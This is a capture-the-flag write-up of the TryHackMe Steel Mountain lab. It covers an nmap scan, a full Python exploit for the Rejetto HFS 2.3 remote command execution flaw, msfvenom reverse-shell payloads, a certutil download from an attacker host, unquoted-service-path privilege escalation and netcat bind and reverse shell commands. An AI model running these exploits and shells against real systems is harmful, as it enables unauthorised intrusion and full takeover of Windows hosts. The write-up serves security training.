THM Steel Mountain

Penetration Test
,

Steel Mountain

Difficulty: Medium→High
Score: 6/10 (Metasploit) 7.5/10 (Without Metasploit)

Target

  1. 2 flags
  2. system privilege

Process

Reconnasissance

Port Service Scan

nmap -p1-10000 10.10.60.210

We can find the port 80,135,139,445,3389,5985,8080 is opened.
Let’s inspect what version of services.

nmap -p80,135,139,445,3389,5985,8080 -A  10.10.60.210
Output:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-22 09:03 EST
Nmap scan report for 10.10.60.210
Host is up (0.23s latency).
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc              Microsoft Windows RPC
139/tcp  open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open  ssl/ms-wbt-server?
|_ssl-date: 2022-01-22T14:05:55+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2022-01-21T13:58:05
|_Not valid after:  2022-07-23T13:58:05
| rdp-ntlm-info:
|   Target_Name: STEELMOUNTAIN
|   NetBIOS_Domain_Name: STEELMOUNTAIN
|   NetBIOS_Computer_Name: STEELMOUNTAIN
|   DNS_Domain_Name: steelmountain
|   DNS_Computer_Name: steelmountain
|   Product_Version: 6.3.9600
|_  System_Time: 2022-01-22T14:05:49+00:00
5985/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open  http               HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%), Microsoft Windows Server 2008 SP2 Datacenter Version (94%), Microsoft Windows 7 or Windows Server 2008 R2 (94%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
|   3.0.2:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2022-01-22T14:05:49
|_  start_date: 2022-01-22T13:57:59
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:0c:ff:1b:e3:f5 (unknown)
TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   225.02 ms 10.11.0.1
2   225.16 ms 10.10.60.210
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.68 seconds

Go to http://10.10.231.27:8080


Inspect the elements, we found the point!

rejetto HTTP FILE SERVER

Google rejetto 2.3 exploit

The script original code [** We will use it again when in without metasploit situation** ]

#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#         It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#         It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux.

#Usage : python Exploit.py <Target IP address> <Target Port Number>
#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
#          You may need to run it multiple times for success!
import urllib2
import sys
try:
  def script_create():
    urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")
  def execute_script():
    urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")
  def nc_run():
    urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")
  ip_addr = "192.168.44.128" #local IP address
  local_port = "443" # Local Port number
  vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
  save= "save|" + vbs
  vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
  exe= "exec|"+vbs2
  vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
  exe1= "exec|"+vbs3
  script_create()
  execute_script()
  nc_run()
except:
  print """[.]Something went wrong..!
  Usage is :[.] python exploit.py <Target IP address>  <Target Port Number>
  Don't forgot to change the Local IP address and Port number on the script"""
C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with
url-decode
C:\Users\Public\script.vbs|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://" ip_addr "/nc.exe", False
// We can open the server to let victim download nc.exe
xHttp.Send
with bStrm
    .type = 1 '//binary
    .open
    .write xHttp.responseBody
    .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite save file
end with

Metasploit

Metasploit search exploit

search rejetto 2.3


OK, let’s use metasploit exploit victim machine first
Use the module, show its options

Change the RHOST SRVHOST LHOST LPORT(Default 4444) value.
RHOST is victim machine IP, RPORT is 8080
SRVHOST and LHOST are LocalMachine IP

Exploiting


OK already got metepreter shell

Find the first flag

Privilege Escalation

upload PowerUp.ps1

load Powershell module

load powershell
powershell_shell

Execute the PowerUp.ps1 in powershell and input Invoke-AllChecks

Find the unqutoed service AdvancedSystemCareService9
Msfvenom make the reverse_shell Advanced.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.61.17 LPORT=4445  -f exe> Advanced.exe

Change the directory, upload Advanced.exe

Check the AdvancedSystemCareService9 status

sc qc AdvancedSystemCareService9


Stop the service and restart it, we can get the system privelege shell


We have to migrate quickly, the sessions will die because not respond services



We can also input this command→migrate the shell automatically

run post/windows/manage/migrate

The best way is create the binary file which will migrate another process automacally

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.61.17 LPORT=4446 -e x86/shikata_ga_nai -b "\x00" -i 5 -a x86 --platform win PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o  Advanced.exe

nc shell

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.61.17 LPORT=4446  -e x86/shikata_ga_nai -b "\x00" -i 5 -a x86 --platform win PrependMigrate=true PrependMigrateProc=svchost.exe -f exe> Advanced.exe

Get the system privilege

Get the flag2

Without Metasploit

Use CVE-2014-6287 to exploit


modify the ip_addr, local_port
Open local server, execute exp

Execute exp again, we can get the reverse_shell

Use binary file winPEAS.exe to enumeration the systeminfo

certutil -urlcache -f http://10.11.61.17/winPEAS.exe winpeas.exe

Execute winpeas.exe in cmd

Find the service path
Use the unqutoed vulnerability or DLL hijacking, the next step can use meterpreter shell or common nc shell to get the Administrator-flag.

Delivery

We can use the nc shell or metasploit shell to upgrade our shell.

Netcat bind shell

A Bind Shell is when the listener is running on the target and you are presented with a command shell when connecting to the target. In other words the target would be waiting for us to connect to it.

Target Machine:
Windows: nc.exe -nvlp <PORT> -e cmd.exe
Linux: nc -nvlp <PORT> -e /bin/sh or /bin/bash
Hacker:
nc -nv <Target Machine IP> <Target Machine Port>

Netcat reverse shell

When we use a bind shell we are able to connect to a target which is fine if there are no firewalls filtering inbound connections, where as in a reverse shell we would set up the listener on our system (attacker) and have the target connect to us and provide us with a command shell.

Hacker:
nc -lnvp <PORT>
Target Machine
Windows: nc.exe <Hacker IP> <Hacker Port>
Linux: nc <Hacker IP> <Hacker Port>

Summary